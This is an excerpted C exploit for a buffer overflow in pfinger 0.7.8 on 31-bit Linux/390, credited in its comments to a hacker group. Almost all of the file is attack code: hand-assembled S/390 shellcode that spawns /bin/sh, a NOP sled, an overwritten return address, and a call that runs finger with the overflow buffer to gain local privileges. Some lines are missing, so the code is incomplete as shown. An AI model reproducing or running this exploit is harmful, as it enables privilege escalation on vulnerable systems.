1 // linux390 (31bit) pfinger-0.7.8 <= local exploit
2 // 390 sploit by jcyberpunk@thehackerschoice.com
3 // diz is just a lame proof of concept sploit
4 // to show how easy 390linux exploitation is
10 "\x0c\x10" /* bassm %r1,%r0 */
11 "\x41\x90\x10\x48" /* la %r9,72(%r1) */
12 "\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
13 "\xa7\x68\x04\x56" /* lhi %r6,1110 */
14 "\x1a\x6a" /* ar %r6,%r10 */
15 "\x42\x60\x10\x48" /* stc %r6,72(%r1) */
16 "\x17\x22" /* xr %r2,%r2 */
17 "\x0d\xe9" /* basr %r14,%r9 */
18 "\xa7\x68\x04\x7a" /* lhi %r6,1146 */
19 "\x1a\x6a" /* ar %r6,%r10 */
20 "\x42\x60\x10\x49" /* stc %r6,73(%r1) */
21 "\x0d\xe9" /* basr %r14,%r9 */
22 "\xa7\x68\x04\x57" /* lhi %r6,1111 */
23 "\x1a\x6a" /* ar %r6,%r10 */
24 "\x42\x60\x10\x49" /* stc %r6,73(%r1) */
25 "\x41\x20\x10\x4c" /* la %r2,76(%r1) */
26 "\x50\x20\x10\x54" /* st %r2,84(%r1) */
27 "\x41\x30\x10\x54" /* la %r3,84(%r1) */
28 "\x17\x44" /* xr %r4,%r4 */
29 "\x42\x40\x10\x53" /* stc %r4,83(%r1) */
30 "\x50\x40\x10\x58" /* st %r4,88(%r1) */
31 "\x41\x40\x10\x58" /* la %r4,88(%r1) */
32 "\x0d\xe9" /* basr %r14,%r9 */
33 "\x0b\x17" /* svc n after self-modification */
34 "\x07\xfe" /* br %r14 */
36 "\x69\x6e\x2f\x73" /* in/s */
42 unsigned char buf[256],*b;
43 unsigned char sc[256];
44 unsigned char nop[]="\x17\x44";
48 for(i=0;i<=100;i++) *b++ = nop[i%2];
49 *(unsigned long *)(buf+160)=0x7fffff92;
50 memcpy(&sc[100-strlen(shellcode)],shellcode,strlen(shellcode));
53 execl("/usr/bin/finger", "finger", buf, NULL);